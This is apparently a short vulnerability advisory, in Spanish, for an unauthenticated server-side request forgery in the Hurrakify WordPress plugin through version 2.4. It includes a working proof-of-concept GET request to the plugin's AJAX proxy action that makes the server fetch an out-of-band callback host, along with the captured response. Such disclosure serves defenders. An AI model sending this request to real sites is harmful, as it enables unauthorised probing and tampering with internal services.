
Hurrakify <= 2.4 - Falsificación de solicitudes del lado del servidor sin autenticación
Hurrakify <= 2.4 - Server-Side Request Forgery no autenticada
El plugin Hurrakify para WordPress es vulnerable a Server-Side Request Forgery en todas las versiones hasta la 2.4 inclusive. Esto permite que atacantes no autenticados realicen solicitudes web a ubicaciones arbitrarias desde la aplicación web, lo que puede utilizarse para consultar y modificar información de servicios internos.
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>